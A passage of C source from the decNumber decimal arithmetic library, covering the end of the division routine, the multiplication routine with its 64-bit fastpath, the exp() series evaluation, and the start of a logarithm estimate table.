decFinish(res, set, &residue, status); /* might clamp */ break; } /* note if the quotient was odd */ if (*accnext & 0x01) wasodd=1; /* acc is odd */ quotlsu=accnext; /* save in case need to reinspect */ quotdigits=accdigits; /* .. */ /* treat the residue, in var1, as the value to return, via acc */ /* calculate the unused zero digits. This is the smaller of: */ /* var1 initial padding (saved above) */ /* var2 residual padding, which happens to be given by: */ postshift=var1initpad+exponent-lhs->exponent+rhs->exponent; /* [the 'exponent' term accounts for the shifts during divide] */ if (var1initpad<postshift) postshift=var1initpad; /* shift var1 the requested amount, and adjust its digits */ var1units=decShiftToLeast(var1, var1units, postshift); accnext=var1; accdigits=decGetDigits(var1, var1units); accunits=D2U(accdigits); exponent=lhs->exponent; /* exponent is smaller of lhs & rhs */ if (rhs->exponent<exponent) exponent=rhs->exponent; /* Now correct the result if doing remainderNear; if it */ /* (looking just at coefficients) is > rhs/2, or == rhs/2 and */ /* the integer was odd then the result should be rem-rhs. */ if (op&REMNEAR) { Int compare, tarunits; /* work */ Unit *up; /* .. */ /* calculate remainder*2 into the var1 buffer (which has */ /* 'headroom' of an extra unit and hence enough space) */ /* [a dedicated 'double' loop would be faster, here] */ tarunits=decUnitAddSub(accnext, accunits, accnext, accunits, 0, accnext, 1); /* decDumpAr('r', accnext, tarunits); */ /* Here, accnext (var1) holds tarunits Units with twice the */ /* remainder's coefficient, which must now be compared to the */ /* RHS. The remainder's exponent may be smaller than the RHS's. */ compare=decUnitCompare(accnext, tarunits, rhs->lsu, D2U(rhs->digits), rhs->exponent-exponent); if (compare==BADINT) { /* deep trouble */ *status|=DEC_Insufficient_storage; break;} /* now restore the remainder by dividing by two; the lsu */ /* is known to be even. */ for (up=accnext; up<accnext+tarunits; up++) { Int half; /* half to add to lower unit */ half=*up & 0x01; *up/=2; /* [shift] */ if (!half) continue; *(up-1)+=DIV_ROUND_UP(DECDPUNMAX, 2); } /* [accunits still describes the original remainder length] */ if (compare>0 || (compare==0 && wasodd)) { /* adjustment needed */ Int exp, expunits, exprem; /* work */ /* This is effectively causing round-up of the quotient, */ /* so if it was the rare case where it was full and all */ /* nines, it would overflow and hence division-impossible */ /* should be raised */ Flag allnines=0; /* 1 if quotient all nines */ if (quotdigits==reqdigits) { /* could be borderline */ for (up=quotlsu; ; up++) { if (quotdigits>DECDPUN) { if (*up!=DECDPUNMAX) break;/* non-nines */ } else { /* this is the last Unit */ if (*up==powers[quotdigits]-1) allnines=1; break; } quotdigits-=DECDPUN; /* checked those digits */ } /* up */ } /* borderline check */ if (allnines) { *status|=DEC_Division_impossible; break;} /* rem-rhs is needed; the sign will invert. Again, var1 */ /* can safely be used for the working Units array. */ exp=rhs->exponent-exponent; /* RHS padding needed */ /* Calculate units and remainder from exponent. */ expunits=exp/DECDPUN; exprem=exp%DECDPUN; /* subtract [A+B*(-m)]; the result will always be negative */ accunits=-decUnitAddSub(accnext, accunits, rhs->lsu, D2U(rhs->digits), expunits, accnext, -(Int)powers[exprem]); accdigits=decGetDigits(accnext, accunits); /* count digits exactly */ accunits=D2U(accdigits); /* and recalculate the units for copy */ /* [exponent is as for original remainder] */ bits^=DECNEG; /* flip the sign */ } } /* REMNEAR */ } /* REMAINDER or REMNEAR */ } /* not DIVIDE */ /* Set exponent and bits */ res->exponent=exponent; res->bits=(uByte)(bits&DECNEG); /* [cleaned] */ /* Now the coefficient. */ decSetCoeff(res, set, accnext, accdigits, &residue, status); decFinish(res, set, &residue, status); /* final cleanup */ #if DECSUBSET /* If a divide then strip trailing zeros if subset [after round] */ if (!set->extended && (op==DIVIDE)) decTrim(res, set, 0, &dropped); #endif } while(0); /* end protected */ if (varalloc!=NULL) free(varalloc); /* drop any storage used */ if (allocacc!=NULL) free(allocacc); /* .. */ #if DECSUBSET if (allocrhs!=NULL) free(allocrhs); /* .. */ if (alloclhs!=NULL) free(alloclhs); /* .. */ #endif return res; } /* decDivideOp */ /* ------------------------------------------------------------------ */ /* decMultiplyOp -- multiplication operation */ /* */ /* This routine performs the multiplication C=A x B. */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X*X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* status is the usual accumulator */ /* */ /* C must have space for set->digits digits. */ /* */ /* ------------------------------------------------------------------ */ /* 'Classic' multiplication is used rather than Karatsuba, as the */ /* latter would give only a minor improvement for the short numbers */ /* expected to be handled most (and uses much more memory). */ /* */ /* There are two major paths here: the general-purpose ('old code') */ /* path which handles all DECDPUN values, and a fastpath version */ /* which is used if 64-bit ints are available, DECDPUN<=4, and more */ /* than two calls to decUnitAddSub would be made. */ /* */ /* The fastpath version lumps units together into 8-digit or 9-digit */ /* chunks, and also uses a lazy carry strategy to minimise expensive */ /* 64-bit divisions. The chunks are then broken apart again into */ /* units for continuing processing. Despite this overhead, the */ /* fastpath can speed up some 16-digit operations by 10x (and much */ /* more for higher-precision calculations). */ /* */ /* A buffer always has to be used for the accumulator; in the */ /* fastpath, buffers are also always needed for the chunked copies of */ /* of the operand coefficients. */ /* Static buffers are larger than needed just for multiply, to allow */ /* for calls from other operations (notably exp). */ /* ------------------------------------------------------------------ */ #define FASTMUL (DECUSE64 && DECDPUN<5) static decNumber * decMultiplyOp(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set, uInt *status) { Int accunits; /* Units of accumulator in use */ Int exponent; /* work */ Int residue=0; /* rounding residue */ uByte bits; /* result sign */ Unit *acc; /* -> accumulator Unit array */ Int needbytes; /* size calculator */ void *allocacc=NULL; /* -> allocated accumulator, iff allocated */ Unit accbuff[SD2U(DECBUFFER*4+1)]; /* buffer (+1 for DECBUFFER==0, */ /* *4 for calls from other operations) */ const Unit *mer, *mermsup; /* work */ Int madlength; /* Units in multiplicand */ Int shift; /* Units to shift multiplicand by */ #if FASTMUL /* if DECDPUN is 1 or 3 work in base 10**9, otherwise */ /* (DECDPUN is 2 or 4) then work in base 10**8 */ #if DECDPUN & 1 /* odd */ #define FASTBASE 1000000000 /* base */ #define FASTDIGS 9 /* digits in base */ #define FASTLAZY 18 /* carry resolution point [1->18] */ #else #define FASTBASE 100000000 #define FASTDIGS 8 #define FASTLAZY 1844 /* carry resolution point [1->1844] */ #endif /* three buffers are used, two for chunked copies of the operands */ /* (base 10**8 or base 10**9) and one base 2**64 accumulator with */ /* lazy carry evaluation */ uInt zlhibuff[(DECBUFFER*2+1)/8+1]; /* buffer (+1 for DECBUFFER==0) */ uInt *zlhi=zlhibuff; /* -> lhs array */ uInt *alloclhi=NULL; /* -> allocated buffer, iff allocated */ uInt zrhibuff[(DECBUFFER*2+1)/8+1]; /* buffer (+1 for DECBUFFER==0) */ uInt *zrhi=zrhibuff; /* -> rhs array */ uInt *allocrhi=NULL; /* -> allocated buffer, iff allocated */ uLong zaccbuff[(DECBUFFER*2+1)/4+2]; /* buffer (+1 for DECBUFFER==0) */ /* [allocacc is shared for both paths, as only one will run] */ uLong *zacc=zaccbuff; /* -> accumulator array for exact result */ #if DECDPUN==1 Int zoff; /* accumulator offset */ #endif uInt *lip, *rip; /* item pointers */ uInt *lmsi, *rmsi; /* most significant items */ Int ilhs, irhs, iacc; /* item counts in the arrays */ Int lazy; /* lazy carry counter */ uLong lcarry; /* uLong carry */ uInt carry; /* carry (NB not uLong) */ Int count; /* work */ const Unit *cup; /* .. */ Unit *up; /* .. */ uLong *lp; /* .. */ Int p; /* .. */ #endif #if DECSUBSET decNumber *alloclhs=NULL; /* -> allocated buffer, iff allocated */ decNumber *allocrhs=NULL; /* -> allocated buffer, iff allocated */ #endif #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif /* precalculate result sign */ bits=(uByte)((lhs->bits^rhs->bits)&DECNEG); /* handle infinities and NaNs */ if (SPECIALARGS) { /* a special bit set */ if (SPECIALARGS & (DECSNAN | DECNAN)) { /* one or two NaNs */ decNaNs(res, lhs, rhs, set, status); return res;} /* one or two infinities; Infinity * 0 is invalid */ if (((lhs->bits & DECINF)==0 && ISZERO(lhs)) ||((rhs->bits & DECINF)==0 && ISZERO(rhs))) { *status|=DEC_Invalid_operation; return res;} decNumberZero(res); res->bits=bits|DECINF; /* infinity */ return res;} /* For best speed, as in DMSRCN [the original Rexx numerics */ /* module], use the shorter number as the multiplier (rhs) and */ /* the longer as the multiplicand (lhs) to minimise the number of */ /* adds (partial products) */ if (lhs->digits<rhs->digits) { /* swap... */ const decNumber *hold=lhs; lhs=rhs; rhs=hold; } do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* reduce operands and set lostDigits status, as needed */ if (lhs->digits>set->digits) { alloclhs=decRoundOperand(lhs, set, status); if (alloclhs==NULL) break; lhs=alloclhs; } if (rhs->digits>set->digits) { allocrhs=decRoundOperand(rhs, set, status); if (allocrhs==NULL) break; rhs=allocrhs; } } #endif /* [following code does not require input rounding] */ #if FASTMUL /* fastpath can be used */ /* use the fast path if there are enough digits in the shorter */ /* operand to make the setup and takedown worthwhile */ #define NEEDTWO (DECDPUN*2) /* within two decUnitAddSub calls */ if (rhs->digits>NEEDTWO) { /* use fastpath... */ /* calculate the number of elements in each array */ ilhs=(lhs->digits+FASTDIGS-1)/FASTDIGS; /* [ceiling] */ irhs=(rhs->digits+FASTDIGS-1)/FASTDIGS; /* .. */ iacc=ilhs+irhs; /* allocate buffers if required, as usual */ needbytes=ilhs*sizeof(uInt); if (needbytes>(Int)sizeof(zlhibuff)) { alloclhi=(uInt *)malloc(needbytes); zlhi=alloclhi;} needbytes=irhs*sizeof(uInt); if (needbytes>(Int)sizeof(zrhibuff)) { allocrhi=(uInt *)malloc(needbytes); zrhi=allocrhi;} /* Allocating the accumulator space needs a special case when */ /* DECDPUN=1 because when converting the accumulator to Units */ /* after the multiplication each 8-byte item becomes 9 1-byte */ /* units. Therefore iacc extra bytes are needed at the front */ /* (rounded up to a multiple of 8 bytes), and the uLong */ /* accumulator starts offset the appropriate number of units */ /* to the right to avoid overwrite during the unchunking. */ needbytes=iacc*sizeof(uLong); #if DECDPUN==1 zoff=(iacc+7)/8; /* items to offset by */ needbytes+=zoff*8; #endif if (needbytes>(Int)sizeof(zaccbuff)) { allocacc=(uLong *)malloc(needbytes); zacc=(uLong *)allocacc;} if (zlhi==NULL||zrhi==NULL||zacc==NULL) { *status|=DEC_Insufficient_storage; break;} acc=(Unit *)zacc; /* -> target Unit array */ #if DECDPUN==1 zacc+=zoff; /* start uLong accumulator to right */ #endif /* assemble the chunked copies of the left and right sides */ for (count=lhs->digits, cup=lhs->lsu, lip=zlhi; count>0; lip++) for (p=0, *lip=0; p<FASTDIGS && count>0; p+=DECDPUN, cup++, count-=DECDPUN) *lip+=*cup*powers[p]; lmsi=lip-1; /* save -> msi */ for (count=rhs->digits, cup=rhs->lsu, rip=zrhi; count>0; rip++) for (p=0, *rip=0; p<FASTDIGS && count>0; p+=DECDPUN, cup++, count-=DECDPUN) *rip+=*cup*powers[p]; rmsi=rip-1; /* save -> msi */ /* zero the accumulator */ for (lp=zacc; lp<zacc+iacc; lp++) *lp=0; /* Start the multiplication */ /* Resolving carries can dominate the cost of accumulating the */ /* partial products, so this is only done when necessary. */ /* Each uLong item in the accumulator can hold values up to */ /* 2**64-1, and each partial product can be as large as */ /* (10**FASTDIGS-1)**2. When FASTDIGS=9, this can be added to */ /* itself 18.4 times in a uLong without overflowing, so during */ /* the main calculation resolution is carried out every 18th */ /* add -- every 162 digits. Similarly, when FASTDIGS=8, the */ /* partial products can be added to themselves 1844.6 times in */ /* a uLong without overflowing, so intermediate carry */ /* resolution occurs only every 14752 digits. Hence for common */ /* short numbers usually only the one final carry resolution */ /* occurs. */ /* (The count is set via FASTLAZY to simplify experiments to */ /* measure the value of this approach: a 35% improvement on a */ /* [34x34] multiply.) */ lazy=FASTLAZY; /* carry delay count */ for (rip=zrhi; rip<=rmsi; rip++) { /* over each item in rhs */ lp=zacc+(rip-zrhi); /* where to add the lhs */ for (lip=zlhi; lip<=lmsi; lip++, lp++) { /* over each item in lhs */ *lp+=(uLong)(*lip)*(*rip); /* [this should in-line] */ } /* lip loop */ lazy--; if (lazy>0 && rip!=rmsi) continue; lazy=FASTLAZY; /* reset delay count */ /* spin up the accumulator resolving overflows */ for (lp=zacc; lp<zacc+iacc; lp++) { if (*lp<FASTBASE) continue; /* it fits */ lcarry=*lp/FASTBASE; /* top part [slow divide] */ /* lcarry can exceed 2**32-1, so check again; this check */ /* and occasional extra divide (slow) is well worth it, as */ /* it allows FASTLAZY to be increased to 18 rather than 4 */ /* in the FASTDIGS=9 case */ if (lcarry<FASTBASE) carry=(uInt)lcarry; /* [usual] */ else { /* two-place carry [fairly rare] */ uInt carry2=(uInt)(lcarry/FASTBASE); /* top top part */ *(lp+2)+=carry2; /* add to item+2 */ *lp-=((uLong)FASTBASE*FASTBASE*carry2); /* [slow] */ carry=(uInt)(lcarry-((uLong)FASTBASE*carry2)); /* [inline] */ } *(lp+1)+=carry; /* add to item above [inline] */ *lp-=((uLong)FASTBASE*carry); /* [inline] */ } /* carry resolution */ } /* rip loop */ /* The multiplication is complete; time to convert back into */ /* units. This can be done in-place in the accumulator and in */ /* 32-bit operations, because carries were resolved after the */ /* final add. This needs N-1 divides and multiplies for */ /* each item in the accumulator (which will become up to N */ /* units, where 2<=N<=9). */ for (lp=zacc, up=acc; lp<zacc+iacc; lp++) { uInt item=(uInt)*lp; /* decapitate to uInt */ for (p=0; p<FASTDIGS-DECDPUN; p+=DECDPUN, up++) { uInt part=item/(DECDPUNMAX+1); *up=(Unit)(item-(part*(DECDPUNMAX+1))); item=part; } /* p */ *up=(Unit)item; up++; /* [final needs no division] */ } /* lp */ accunits=up-acc; /* count of units */ } else { /* here to use units directly, without chunking ['old code'] */ #endif /* if accumulator will be too long for local storage, then allocate */ acc=accbuff; /* -> assume buffer for accumulator */ needbytes=(D2U(lhs->digits)+D2U(rhs->digits))*sizeof(Unit); if (needbytes>(Int)sizeof(accbuff)) { allocacc=(Unit *)malloc(needbytes); if (allocacc==NULL) {*status|=DEC_Insufficient_storage; break;} acc=(Unit *)allocacc; /* use the allocated space */ } /* Now the main long multiplication loop */ /* Unlike the equivalent in the IBM Java implementation, there */ /* is no advantage in calculating from msu to lsu. So, do it */ /* by the book, as it were. */ /* Each iteration calculates ACC=ACC+MULTAND*MULT */ accunits=1; /* accumulator starts at '0' */ *acc=0; /* .. (lsu=0) */ shift=0; /* no multiplicand shift at first */ madlength=D2U(lhs->digits); /* this won't change */ mermsup=rhs->lsu+D2U(rhs->digits); /* -> msu+1 of multiplier */ for (mer=rhs->lsu; mer<mermsup; mer++) { /* Here, *mer is the next Unit in the multiplier to use */ /* If non-zero [optimization] add it... */ if (*mer!=0) accunits=decUnitAddSub(&acc[shift], accunits-shift, lhs->lsu, madlength, 0, &acc[shift], *mer) + shift; else { /* extend acc with a 0; it will be used shortly */ *(acc+accunits)=0; /* [this avoids length of <=0 later] */ accunits++; } /* multiply multiplicand by 10**DECDPUN for next Unit to left */ shift++; /* add this for 'logical length' */ } /* n */ #if FASTMUL } /* unchunked units */ #endif /* common end-path */ #if DECTRACE decDumpAr('*', acc, accunits); /* Show exact result */ #endif /* acc now contains the exact result of the multiplication, */ /* possibly with a leading zero unit; build the decNumber from */ /* it, noting if any residue */ res->bits=bits; /* set sign */ res->digits=decGetDigits(acc, accunits); /* count digits exactly */ /* There can be a 31-bit wrap in calculating the exponent. */ /* This can only happen if both input exponents are negative and */ /* both their magnitudes are large. If there was a wrap, set a */ /* safe very negative exponent, from which decFinalize() will */ /* raise a hard underflow shortly. */ exponent=lhs->exponent+rhs->exponent; /* calculate exponent */ if (lhs->exponent<0 && rhs->exponent<0 && exponent>0) exponent=-2*DECNUMMAXE; /* force underflow */ res->exponent=exponent; /* OK to overwrite now */ /* Set the coefficient. If any rounding, residue records */ decSetCoeff(res, set, acc, res->digits, &residue, status); decFinish(res, set, &residue, status); /* final cleanup */ } while(0); /* end protected */ if (allocacc!=NULL) free(allocacc); /* drop any storage used */ #if DECSUBSET if (allocrhs!=NULL) free(allocrhs); /* .. */ if (alloclhs!=NULL) free(alloclhs); /* .. */ #endif #if FASTMUL if (allocrhi!=NULL) free(allocrhi); /* .. */ if (alloclhi!=NULL) free(alloclhi); /* .. */ #endif return res; } /* decMultiplyOp */ /* ------------------------------------------------------------------ */ /* decExpOp -- effect exponentiation */ /* */ /* This computes C = exp(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context; note that rounding mode has no effect */ /* */ /* C must have space for set->digits digits. status is updated but */ /* not set. */ /* */ /* Restrictions: */ /* */ /* digits, emax, and -emin in the context must be less than */ /* 2*DEC_MAX_MATH (1999998), and the rhs must be within these */ /* bounds or a zero. This is an internal routine, so these */ /* restrictions are contractual and not enforced. */ /* */ /* A finite result is rounded using DEC_ROUND_HALF_EVEN; it will */ /* almost always be correctly rounded, but may be up to 1 ulp in */ /* error in rare cases. */ /* */ /* Finite results will always be full precision and Inexact, except */ /* when A is a zero or -Infinity (giving 1 or 0 respectively). */ /* ------------------------------------------------------------------ */ /* This approach used here is similar to the algorithm described in */ /* */ /* Variable Precision Exponential Function, T. E. Hull and */ /* A. Abrham, ACM Transactions on Mathematical Software, Vol 12 #2, */ /* pp79-91, ACM, June 1986. */ /* */ /* with the main difference being that the iterations in the series */ /* evaluation are terminated dynamically (which does not require the */ /* extra variable-precision variables which are expensive in this */ /* context). */ /* */ /* The error analysis in Hull & Abrham's paper applies except for the */ /* round-off error accumulation during the series evaluation. This */ /* code does not precalculate the number of iterations and so cannot */ /* use Horner's scheme. Instead, the accumulation is done at double- */ /* precision, which ensures that the additions of the terms are exact */ /* and do not accumulate round-off (and any round-off errors in the */ /* terms themselves move 'to the right' faster than they can */ /* accumulate). This code also extends the calculation by allowing, */ /* in the spirit of other decNumber operators, the input to be more */ /* precise than the result (the precision used is based on the more */ /* precise of the input or requested result). */ /* */ /* Implementation notes: */ /* */ /* 1. This is separated out as decExpOp so it can be called from */ /* other Mathematical functions (notably Ln) with a wider range */ /* than normal. In particular, it can handle the slightly wider */ /* (double) range needed by Ln (which has to be able to calculate */ /* exp(-x) where x can be the tiniest number (Ntiny). */ /* */ /* 2. Normalizing x to be <=0.1 (instead of <=1) reduces loop */ /* iterations by approximately a third with additional (although */ /* diminishing) returns as the range is reduced to even smaller */ /* fractions. However, h (the power of 10 used to correct the */ /* result at the end, see below) must be kept <=8 as otherwise */ /* the final result cannot be computed. Hence the leverage is a */ /* sliding value (8-h), where potentially the range is reduced */ /* more for smaller values. */ /* */ /* The leverage that can be applied in this way is severely */ /* limited by the cost of the raise-to-the power at the end, */ /* which dominates when the number of iterations is small (less */ /* than ten) or when rhs is short. As an example, the adjustment */ /* x**10,000,000 needs 31 multiplications, all but one full-width. */ /* */ /* 3. The restrictions (especially precision) could be raised with */ /* care, but the full decNumber range seems very hard within the */ /* 32-bit limits. */ /* */ /* 4. The working precisions for the static buffers are twice the */ /* obvious size to allow for calls from decNumberPower. */ /* ------------------------------------------------------------------ */ static decNumber *decExpOp(decNumber *res, const decNumber *rhs, decContext *set, uInt *status) { uInt ignore=0; /* working status */ Int h; /* adjusted exponent for 0.xxxx */ Int p; /* working precision */ Int residue; /* rounding residue */ uInt needbytes; /* for space calculations */ const decNumber *x=rhs; /* (may point to safe copy later) */ decContext aset, tset, dset; /* working contexts */ Int comp; /* work */ /* the argument is often copied to normalize it, so (unusually) it */ /* is treated like other buffers, using DECBUFFER, +1 in case */ /* DECBUFFER is 0 */ decNumber bufr[D2N(DECBUFFER*2+1)]; decNumber *allocrhs=NULL; /* non-NULL if rhs buffer allocated */ /* the working precision will be no more than set->digits+8+1 */ /* so for on-stack buffers DECBUFFER+9 is used, +1 in case DECBUFFER */ /* is 0 (and twice that for the accumulator) */ /* buffer for t, term (working precision plus) */ decNumber buft[D2N(DECBUFFER*2+9+1)]; decNumber *allocbuft=NULL; /* -> allocated buft, iff allocated */ decNumber *t=buft; /* term */ /* buffer for a, accumulator (working precision * 2), at least 9 */ decNumber bufa[D2N(DECBUFFER*4+18+1)]; decNumber *allocbufa=NULL; /* -> allocated bufa, iff allocated */ decNumber *a=bufa; /* accumulator */ /* decNumber for the divisor term; this needs at most 9 digits */ /* and so can be fixed size [16 so can use standard context] */ decNumber bufd[D2N(16)]; decNumber *d=bufd; /* divisor */ decNumber numone; /* constant 1 */ #if DECCHECK Int iterations=0; /* for later sanity check */ if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif do { /* protect allocated storage */ if (SPECIALARG) { /* handle infinities and NaNs */ if (decNumberIsInfinite(rhs)) { /* an infinity */ if (decNumberIsNegative(rhs)) /* -Infinity -> +0 */ decNumberZero(res); else decNumberCopy(res, rhs); /* +Infinity -> self */ } else decNaNs(res, rhs, NULL, set, status); /* a NaN */ break;} if (ISZERO(rhs)) { /* zeros -> exact 1 */ decNumberZero(res); /* make clean 1 */ *res->lsu=1; /* .. */ break;} /* [no status to set] */ /* e**x when 0 < x < 0.66 is < 1+3x/2, hence can fast-path */ /* positive and negative tiny cases which will result in inexact */ /* 1. This also allows the later add-accumulate to always be */ /* exact (because its length will never be more than twice the */ /* working precision). */ /* The comparator (tiny) needs just one digit, so use the */ /* decNumber d for it (reused as the divisor, etc., below); its */ /* exponent is such that if x is positive it will have */ /* set->digits-1 zeros between the decimal point and the digit, */ /* which is 4, and if x is negative one more zero there as the */ /* more precise result will be of the form 0.9999999 rather than */ /* 1.0000001. Hence, tiny will be 0.0000004 if digits=7 and x>0 */ /* or 0.00000004 if digits=7 and x<0. If RHS not larger than */ /* this then the result will be 1.000000 */ decNumberZero(d); /* clean */ *d->lsu=4; /* set 4 .. */ d->exponent=-set->digits; /* * 10**(-d) */ if (decNumberIsNegative(rhs)) d->exponent--; /* negative case */ comp=decCompare(d, rhs, 1); /* signless compare */ if (comp==BADINT) { *status|=DEC_Insufficient_storage; break;} if (comp>=0) { /* rhs < d */ Int shift=set->digits-1; decNumberZero(res); /* set 1 */ *res->lsu=1; /* .. */ res->digits=decShiftToMost(res->lsu, 1, shift); res->exponent=-shift; /* make 1.0000... */ *status|=DEC_Inexact | DEC_Rounded; /* .. inexactly */ break;} /* tiny */ /* set up the context to be used for calculating a, as this is */ /* used on both paths below */ decContextDefault(&aset, DEC_INIT_DECIMAL64); /* accumulator bounds are as requested (could underflow) */ aset.emax=set->emax; /* usual bounds */ aset.emin=set->emin; /* .. */ aset.clamp=0; /* and no concrete format */ /* calculate the adjusted (Hull & Abrham) exponent (where the */ /* decimal point is just to the left of the coefficient msd) */ h=rhs->exponent+rhs->digits; /* if h>8 then 10**h cannot be calculated safely; however, when */ /* h=8 then exp(|rhs|) will be at least exp(1E+7) which is at */ /* least 6.59E+4342944, so (due to the restriction on Emax/Emin) */ /* overflow (or underflow to 0) is guaranteed -- so this case can */ /* be handled by simply forcing the appropriate excess */ if (h>8) { /* overflow/underflow */ /* set up here so Power call below will over or underflow to */ /* zero; set accumulator to either 2 or 0.02 */ /* [stack buffer for a is always big enough for this] */ decNumberZero(a); *a->lsu=2; /* not 1 but < exp(1) */ if (decNumberIsNegative(rhs)) a->exponent=-2; /* make 0.02 */ h=8; /* clamp so 10**h computable */ p=9; /* set a working precision */ } else { /* h<=8 */ Int maxlever=(rhs->digits>8?1:0); /* [could/should increase this for precisions >40 or so, too] */ /* if h is 8, cannot normalize to a lower upper limit because */ /* the final result will not be computable (see notes above), */ /* but leverage can be applied whenever h is less than 8. */ /* Apply as much as possible, up to a MAXLEVER digits, which */ /* sets the tradeoff against the cost of the later a**(10**h). */ /* As h is increased, the working precision below also */ /* increases to compensate for the "constant digits at the */ /* front" effect. */ Int lever=MINI(8-h, maxlever); /* leverage attainable */ Int use=-rhs->digits-lever; /* exponent to use for RHS */ h+=lever; /* apply leverage selected */ if (h<0) { /* clamp */ use+=h; /* [may end up subnormal] */ h=0; } /* Take a copy of RHS if it needs normalization (true whenever x>=1) */ if (rhs->exponent!=use) { decNumber *newrhs=bufr; /* assume will fit on stack */ needbytes=sizeof(decNumber)+(D2U(rhs->digits)-1)*sizeof(Unit); if (needbytes>sizeof(bufr)) { /* need malloc space */ allocrhs=(decNumber *)malloc(needbytes); if (allocrhs==NULL) { /* hopeless -- abandon */ *status|=DEC_Insufficient_storage; break;} newrhs=allocrhs; /* use the allocated space */ } decNumberCopy(newrhs, rhs); /* copy to safe space */ newrhs->exponent=use; /* normalize; now <1 */ x=newrhs; /* ready for use */ /* decNumberShow(x); */ } /* Now use the usual power series to evaluate exp(x). The */ /* series starts as 1 + x + x^2/2 ... so prime ready for the */ /* third term by setting the term variable t=x, the accumulator */ /* a=1, and the divisor d=2. */ /* First determine the working precision. From Hull & Abrham */ /* this is set->digits+h+2. However, if x is 'over-precise' we */ /* need to allow for all its digits to potentially participate */ /* (consider an x where all the excess digits are 9s) so in */ /* this case use x->digits+h+2 */ p=MAXI(x->digits, set->digits)+h+2; /* [h<=8] */ /* a and t are variable precision, and depend on p, so space */ /* must be allocated for them if necessary */ /* the accumulator needs to be able to hold 2p digits so that */ /* the additions on the second and subsequent iterations are */ /* sufficiently exact. */ needbytes=sizeof(decNumber)+(D2U(p*2)-1)*sizeof(Unit); if (needbytes>sizeof(bufa)) { /* need malloc space */ allocbufa=(decNumber *)malloc(needbytes); if (allocbufa==NULL) { /* hopeless -- abandon */ *status|=DEC_Insufficient_storage; break;} a=allocbufa; /* use the allocated space */ } /* the term needs to be able to hold p digits (which is */ /* guaranteed to be larger than x->digits, so the initial copy */ /* is safe); it may also be used for the raise-to-power */ /* calculation below, which needs an extra two digits */ needbytes=sizeof(decNumber)+(D2U(p+2)-1)*sizeof(Unit); if (needbytes>sizeof(buft)) { /* need malloc space */ allocbuft=(decNumber *)malloc(needbytes); if (allocbuft==NULL) { /* hopeless -- abandon */ *status|=DEC_Insufficient_storage; break;} t=allocbuft; /* use the allocated space */ } decNumberCopy(t, x); /* term=x */ decNumberZero(a); *a->lsu=1; /* accumulator=1 */ decNumberZero(d); *d->lsu=2; /* divisor=2 */ decNumberZero(&numone); *numone.lsu=1; /* constant 1 for increment */ /* set up the contexts for calculating a, t, and d */ decContextDefault(&tset, DEC_INIT_DECIMAL64); dset=tset; /* accumulator bounds are set above, set precision now */ aset.digits=p*2; /* double */ /* term bounds avoid any underflow or overflow */ tset.digits=p; tset.emin=DEC_MIN_EMIN; /* [emax is plenty] */ /* [dset.digits=16, etc., are sufficient] */ /* finally ready to roll */ for (;;) { #if DECCHECK iterations++; #endif /* only the status from the accumulation is interesting */ /* [but it should remain unchanged after first add] */ decAddOp(a, a, t, &aset, 0, status); /* a=a+t */ decMultiplyOp(t, t, x, &tset, &ignore); /* t=t*x */ decDivideOp(t, t, d, &tset, DIVIDE, &ignore); /* t=t/d */ /* the iteration ends when the term cannot affect the result, */ /* if rounded to p digits, which is when its value is smaller */ /* than the accumulator by p+1 digits. There must also be */ /* full precision in a. */ if (((a->digits+a->exponent)>=(t->digits+t->exponent+p+1)) && (a->digits>=p)) break; decAddOp(d, d, &numone, &dset, 0, &ignore); /* d=d+1 */ } /* iterate */ #if DECCHECK /* just a sanity check; comment out test to show always */ if (iterations>p+3) printf("Exp iterations=%ld, status=%08lx, p=%ld, d=%ld\n", iterations, *status, p, x->digits); #endif } /* h<=8 */ /* apply postconditioning: a=a**(10**h) -- this is calculated */ /* at a slightly higher precision than Hull & Abrham suggest */ if (h>0) { Int seenbit=0; /* set once a 1-bit is seen */ Int i; /* counter */ Int n=powers[h]; /* always positive */ aset.digits=p+2; /* sufficient precision */ /* avoid the overhead and many extra digits of decNumberPower */ /* as all that is needed is the short 'multipliers' loop; here */ /* accumulate the answer into t */ decNumberZero(t); *t->lsu=1; /* acc=1 */ for (i=1;;i++){ /* for each bit [top bit ignored] */ /* abandon if have had overflow or terminal underflow */ if (*status & (DEC_Overflow|DEC_Underflow)) { /* interesting? */ if (*status&DEC_Overflow || ISZERO(t)) break;} n=n<<1; /* move next bit to testable position */ if (n<0) { /* top bit is set */ seenbit=1; /* OK, have a significant bit */ decMultiplyOp(t, t, a, &aset, status); /* acc=acc*x */ } if (i==31) break; /* that was the last bit */ if (!seenbit) continue; /* no need to square 1 */ decMultiplyOp(t, t, t, &aset, status); /* acc=acc*acc [square] */ } /*i*/ /* 32 bits */ /* decNumberShow(t); */ a=t; /* and carry on using t instead of a */ } /* Copy and round the result to res */ residue=1; /* indicate dirt to right .. */ if (ISZERO(a)) residue=0; /* .. unless underflowed to 0 */ aset.digits=set->digits; /* [use default rounding] */ decCopyFit(res, a, &aset, &residue, status); /* copy & shorten */ decFinish(res, set, &residue, status); /* cleanup/set flags */ } while(0); /* end protected */ if (allocrhs !=NULL) free(allocrhs); /* drop any storage used */ if (allocbufa!=NULL) free(allocbufa); /* .. */ if (allocbuft!=NULL) free(allocbuft); /* .. */ /* [status is handled by caller] */ return res; } /* decExpOp */ /* ------------------------------------------------------------------ */ /* Initial-estimate natural logarithm table */ /* */ /* LNnn -- 90-entry 16-bit table for values from .10 through .99. */ /* The result is a 4-digit encode of the coefficient (c=the */ /* top 14 bits encoding 0-9999) and a 2-digit encode of the */ /* exponent (e=the bottom 2 bits encoding 0-3) */ /* */ /* The resulting value is given by: */ /* */ /* v = -c * 10**(-e-3) */ /* */ /* where e and c are extracted from entry k = LNnn[x-10] */ /* where x is truncated (NB) into the range 10 through 99, */ /* and then c = k>>2 and e = k&3. */ /* ------------------------------------------------------------------ */ static const uShort LNnn[90] = { 9016, 8652, 8316, 8008, 7724, 7456, 7208, 6972, 6748, 6540, 6340, 6148, 5968, 5792, 5628, 5464, 5312, 5164, 5020, 4884, 4748, 4620, 4496, 4376, 4256, 4144, 4032, 39233, 38181, 37157, 36157, 35181, 34229, 33297, 32389, 31501, 